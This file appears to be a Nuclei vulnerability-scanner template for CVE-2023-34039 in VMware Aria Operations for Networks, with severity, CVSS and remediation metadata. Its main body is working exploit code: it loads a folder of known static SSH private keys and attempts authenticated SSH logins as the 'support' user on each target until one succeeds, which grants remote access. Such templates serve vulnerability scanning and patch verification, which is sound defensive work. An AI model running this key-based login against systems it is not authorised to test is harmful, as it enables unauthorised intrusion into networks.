id: CVE-2023-34039

info:
  name: VMWare Aria Operations - Remote Code Execution
  author: tarunKoyalwar
  severity: critical
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
    Version: All versions from 6.0 to 6.10
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
  reference:
    - https://github.com/sinsinology/CVE-2023-34039.git
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34039
    - http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html
    - https://www.vmware.com/security/advisories/VMSA-2023-0018.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34039
    cwe-id: CWE-327
    epss-score: 0.9013
    epss-percentile: 0.98721
    cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: vmware
    product: aria_operations_for_networks
  tags: js,packetstorm,cve,cve2019,vmware,aria,rce,fuzz,vrealize
variables:
  keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory

javascript:
  # init field can be used to make any preperations before the actual exploit
  # here we are reading all private keys from helpers folder and storing them in a list
  - init: |
      let m = require('nuclei/fs');
      let privatekeys = m.ReadFilesFromDir(keysDir)
      updatePayload('keys',privatekeys)
    # check if port is open before bruteforcing
    pre-condition: |
      isPortOpen(Host,Port)
    # actual exploit
    code: |
      let m = require('nuclei/ssh')
      let c = m.SSHClient()
      c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful
    args:
      Host: "{{Host}}"
      Port: "22"
      key: "{{keys}}"
      keysDir: "{{keysDir}}"
    payloads:
      # 'keys' will be updated by actual private keys after init is executed
      keys:
        - dummy1
        - dummy2
    threads: 10
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - success && response
# digest: 4a0a0047304502202b98e75ed8b7179fce923039e93baf0da9359ae4bd9edd5f205768ed70bbdd2d022100fdd378ca41e7a2cb85cf3c74f02fc2418502e6aac28860f13d8a20aaa60ce903:922c64590222798bb761d5b6d8e72950